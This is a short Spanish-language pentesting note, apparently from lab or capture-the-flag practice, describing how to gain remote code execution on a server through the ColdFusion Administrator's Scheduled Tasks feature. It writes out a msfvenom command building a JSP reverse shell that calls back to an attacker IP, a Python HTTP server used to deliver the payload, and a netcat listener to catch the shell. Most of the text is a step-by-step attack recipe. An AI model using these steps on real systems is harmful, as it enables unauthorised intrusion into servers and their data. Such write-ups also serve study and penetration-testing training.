ColdFusion Administrator

¿Qué es y como funciona?

Coldfusion es una plataforma de desarrollo rápido de aplicaciones web que usa el lenguaje de programación CFML. En este aspecto, es un producto similar a ASP, JSP o PHP. ColdFusion es una herramienta que corre en forma concurrente con la mayoría de los servidores web de Windows, Mac OS X, Linux y Solaris

RCE administrator panel

Si conseguimos acceder al Administrator del ColdFusion como el usuario Administrador y tenemos directory listing de los archivos del sistema, podemos subir un archivo malicioso que puede ser tanto ASP, JSP o PHP el cúal nos permita tener acceso al sistema victima, se puede subir mediante:

• Scheduled Tasks

1. Entramos en Schedule Tasks y le damos a Shecule New Task

1. Y antes de poner los nombres, creamos con msfvenom el payload que subiremos a la máquina victima y que nos dará acceso a ella.

Seleccionamos la java/jsp_shell_reverse_tcp

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.14 LPORT=4443 -o exploit.jsp

1. Donde está el exploit.jsp abrimos un servidor con python para que lo descarge el ColdFusion y lo suba.

python3 -m http.server 9000

• Para saber donde se alojan los archivos, tenemos que ir a Server Settings --> Mapping

Alojamiento archivos que se suben

1. Una vez ya sabemos donde se suben los archivos y hemos creado el payload, ahora toca rellenar la tarea.

Tarea programada

1. Ejecutamos la tarea para que se descarge el exploit.jsp

Petición GET al exploit.jsp

1. Si actualizamos el directory listing vemos que está el exploit.jsp

1. Ponemos un listener para que espere la petición que nos dará el exploit.jsp una vez le demos click

rlwrap -nc -lvnp 4443 # rlwrap para tener una consola interactiva, poder hacer Ctrl+L y mover tranquilamente las flechas etc

Shell sistema victima